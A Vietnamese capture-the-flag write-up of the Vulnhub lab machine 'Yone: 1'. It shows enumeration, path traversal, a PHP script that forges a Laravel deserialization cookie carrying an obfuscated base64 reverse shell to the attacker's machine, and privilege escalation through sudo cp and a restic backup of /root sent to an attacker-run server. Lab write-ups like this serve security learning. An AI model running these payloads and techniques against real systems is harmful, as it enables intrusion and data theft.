[Vulnhub] Yone Writeups
Bài đăng này đã không được cập nhật trong 4 năm
Tiếp tục với series những bài vulnhub, lần này tiếp tục là một box medium của team SunCSR nhé.
I. Tổng quan
About Release
Name: Yone: 1
Date release: 26 Aug 2020
Author: SunCSR Team
Series: Yone
Description
Difficulty: Medium
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
Information: Your feedback is appreciated - Email: suncsr.challenges@gmail.com
File Information
Filename: Yone.ova
File size: 1.7 GB
MD5: 26CA6A38AC3C13DBD8A8BC6AECFCFAE0
SHA1: 8720B61AB6EA0E09CC4CD20415F5FA1BA66EE7CF
Screenshots
II. Exploit
Host discovery
root@kali:~# nmap -sP 172.16.27.129/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 21:02 EDT
Nmap scan report for 172.16.27.1
Host is up (0.00032s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.27.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:E1:5F:7D (VMware)
Nmap scan report for 172.16.27.128 <== yone machine
Host is up (0.00024s latency).
MAC Address: 00:0C:29:90:50:FB (VMware)
Nmap scan report for 172.16.27.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:FA:EB:22 (VMware)
Nmap scan report for 172.16.27.129 <== my machine
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
Ở đây, ngoài các địa chỉ của vmware, có 2 địa chỉ active là 172.16.27.128
(máy target) và 172.16.27.129
(máy mình).
Service enumeration
root@kali:~# nmap -sV -p- -Pn 172.16.27.128
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 21:06 EDT
Nmap scan report for 172.16.27.128
Host is up (0.00095s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:90:50:FB (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.42 seconds
Ở đây, chỉ có 2 dịch vụ đang chạy là ssh
và nginx server
.
Thử truy cập vào web của target, mình thấy các ảnh được load từ domain yone.lc
. Thử edit file /etc/hosts
rồi truy cập lại lần nữa
127.0.0.1 localhost
127.0.1.1 kalic
172.16.27.128 yone.lc
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ok, ảnh thì load được rồi. Tuy nhiên tìm kiếm trong trang này không có gì đặc sắc cả.
[21:17:54] Starting:
[21:18:11] 301 - 194B - /images -> http://172.16.27.128/images/
[21:18:11] 403 - 580B - /images/
[21:18:11] 200 - 33KB - /index.html
[21:18:14] 301 - 194B - /media -> http://172.16.27.128/media/
[21:18:21] 403 - 580B - /templates/
[21:18:21] 301 - 194B - /templates -> http://172.16.27.128/templates/
Task Completed
Thử truy cập theo domain name thì mình thấy một chút hay ho ở đây
Thử đăng kí một tài khoản rồi đăng nhập vào xem sao
Ở đây có 1 trang upload file. Tuy nhiên, file php thì bị chặn. Thử click vào 1 file trong này thì mình thấy vài thứ có vẻ khai thác được.
thử chút payload với path traversal, quả nhiên là dính ))
Trong file passwd
có vẻ không khai thác được gì tiếp
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
yone:x:1000:1000:SunCSR,,,:/home/yone:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
Giờ vứt vào burp và thử tìm xem có file gì hay ho không. Sau khi tìm kiếm 1 hồi thì mình thấy file composer.json
của trang này:
oops, ở đây phiên bản laravel là 5.5.41. Thử tìm kiếm lỗ hổng với phiên bản này, mình tìm được 1 mã khai thác của metasploit cho phép RCE.
Tuy nhiên, không hiểu sao mã này không lấy shell được của machine này ))) Thế là hành trình tìm kiếm lại tiếp tục. Mình lại tiếp tục search các bài phân tích về lỗ hổng này, mình thấy 1 bài khá chi tiết ở đây.
Ngâm cứu thêm chút về lỗi này thì nó xảy ra do việc deserialize không an toàn của các phiên bản laravel trước 5.6.30. Tác giả đã phân tích rất chi tiết về lỗi này cũng như có cả payload PoC luôn ))))
<?php
$cipher = 'AES-256-CBC';
$app_key = 'base64:*********F0=';
$chain_name = 'Laravel/RCE6';
$payload = 'system(\'mkfifo .s && /bin/sh -i < .s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:443 > .s && rm .s\');';
// Use PHPGGC to generate the gadget chain
$chain = shell_exec('./phpggc/phpggc '.$chain_name.' "'.$payload.'"');
// Key can be stored as base64 or string.
if( explode(":", $app_key)[0] === 'base64' ) {
$app_key = base64_decode(explode(':', $app_key)[1]);
}
// Create cookie
$iv = random_bytes(openssl_cipher_iv_length($cipher));
$value = \openssl_encrypt($chain, $cipher, $app_key, 0, $iv);
$iv = base64_encode($iv);
$mac = hash_hmac('sha256', $iv.$value, $app_key);
$json = json_encode(compact('iv', 'value', 'mac'));
// Print the results
die(urlencode(base64_encode($json)));
Thôi thì lười lười dùng luôn payload của tác giả vậy ))). Tuy nhiên ở đây còn thiếu 1 app_key nữa. Phiên bản laravel này còn có 1 CVE khác là CVE-2017-16894. Theo đó thì cấu hình env
sẽ có thể tìm được tại .env
của web. Thử tìm kiếm chút quả nhiên là thấy liền.
Giờ có đủ hết rồi thì thay payload khai thác vào và tấn công thôi
<?php
$cipher = 'AES-256-CBC';
$app_key = 'base64:vVrSObaPyv3g0b8m6Ky/IjWZDPxiFnW7K4r0VDcWcbk=';
$chain_name = 'Laravel/RCE6';
$payload = 'system(\'echo cHl0aG9uIC1jICJpbXBvcnQgb3M7aW1wb3J0IHB0eTtpbXBvcnQgc29ja2V0O0RSZEhnemFjYW5yQm1tPScxNzIuMTYuMjcuMTI5JztnQkNsYmlIbFBieHZZPTEyMzQ7ZEVlcGx0cnNQU25iPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtkRWVwbHRyc1BTbmIuY29ubmVjdCgoRFJkSGd6YWNhbnJCbW0sZ0JDbGJpSGxQYnh2WSkpO29zLmR1cDIoZEVlcGx0cnNQU25iLmZpbGVubygpLDApO29zLmR1cDIoZEVlcGx0cnNQU25iLmZpbGVubygpLDEpO29zLmR1cDIoZEVlcGx0cnNQU25iLmZpbGVubygpLDIpO29zLnB1dGVudignSElTVEZJTEUnLCcvZGV2L251bGwnKTtwdHkuc3Bhd24oJy9iaW4vYmFzaCcpO2RFZXBsdHJzUFNuYi5jbG9zZSgpOyI=|base64 -d|/bin/bash\');';
// Use PHPGGC to generate the gadget chain
$chain = shell_exec('~/phpggc/phpggc '.$chain_name.' "'.$payload.'"');
// Key can be stored as base64 or string.
if( explode(":", $app_key)[0] === 'base64' ) {
$app_key = base64_decode(explode(':', $app_key)[1]);
}
// Create cookie
$iv = random_bytes(openssl_cipher_iv_length($cipher));
$value = \openssl_encrypt($chain, $cipher, $app_key, 0, $iv);
$iv = base64_encode($iv);
$mac = hash_hmac('sha256', $iv.$value, $app_key);
$json = json_encode(compact('iv', 'value', 'mac'));
// Print the results
die(urlencode(base64_encode($json)));
Thử với sudo -l
, mình thấy 1 thứ hay ho khác để khai thác:
www-data@ubuntu:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(yone) NOPASSWD: /bin/cp
Chúng ta có thể sử dụng /bin/cp
với quyền của user yone
. Hmmm, mà copy gì bây giờ? Thử tìm trong thư mục home của user này xem sao
www-data@ubuntu:/tmp$ ls -la /home/yone
ls -la /home/yone
total 32
drwxr-xr-x 4 yone yone 4096 Oct 26 04:30 .
drwxr-xr-x 3 root root 4096 Aug 19 17:59 ..
-rw------- 1 yone yone 574 Oct 27 17:42 .bash_history
-rw-r--r-- 1 yone yone 220 Aug 19 17:59 .bash_logout
drwx------ 3 yone yone 4096 Oct 27 17:45 .cache
-rw------- 1 yone yone 413 Aug 25 18:29 .mysql_history
-rw-r--r-- 1 yone yone 655 Aug 19 17:59 .profile
drwxr--r-- 2 yone yone 4096 Oct 26 03:08 .ssh
-rw-r--r-- 1 root root 0 Aug 21 00:45 .sudo_as_admin_successful
Trong thư mục .ssh
, mình thấy 1 file authorized_keys
.
ls -la /home/yone/.ssh
ls: cannot access '/home/yone/.ssh/.': Permission denied
ls: cannot access '/home/yone/.ssh/authorized_keys': Permission denied
ls: cannot access '/home/yone/.ssh/id_rsa': Permission denied
ls: cannot access '/home/yone/.ssh/..': Permission denied
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
-????????? ? ? ? ? ? authorized_keys
Vậy chắc chúng ta phải ghi đè file này rồi. Tự tạo một file authorized_keys
ở máy mình rồi add public key của mình vào, sau đó down về máy target. Dùng sudo để ghi đè file authorized_keys của user yone
sudo -u yone /bin/cp authorized_keys /home/yone/.ssh/authorized_keys
Giờ có authorized_keys rồi, chỉ cần ssh vào tài khoản này thôi
Tiếp tục xem quyền sudo của user này, lại là 1 thứ hay ho khác
yone@ubuntu:~$ sudo -l
Matching Defaults entries for yone on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User yone may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/restic backup -r rest*
User này có quyền sử dụng restic với quyền root mà không cần mật khẩu. Restic là một phân mềm mã nguồn mở cho phép backup dữ liệu. Giờ mình cần cài đặt restic và rest-server trên máy mình.
sudo apt-get install restic
git clone https://github.com/restic/rest-server.git
sau đó build rest-server
cd rest-server
CGO_ENABLED=0 go build -o rest-server ./cmd/rest-server
Tiếp theo là khởi tạo 1 repo cho restic
restic init -r /tmp/restic
Giờ chạy server
./rest-server --no-auth
Tiếp theo, để tiện thì mình port forwarding sang máy target:
ssh -R 8000:127.0.0.1:8000 yone@172.16.27.128
Giờ chỉ cần qua máy target backup thư mục mình cần thôi. Vì flag nằm trong /root nên mình sẽ backup lại thư mục này
sudo -u root /usr/bin/restic backup -r rest:http://127.0.0.1:8000/ /root
Quay lại máy mình, vào thư mục backup (/tmp/restic
). Trong thư mục snapshot, sẽ thấy 1 file backup của thư mục /root
Giờ chỉ cần restore và lấy cờ thôi
restic -r /tmp/restic restore 480b29be019c3b76b3b43f9254250a7444c1b9665ae6624de052e5aadfb29880 --target /tmp/restic-root
All rights reserved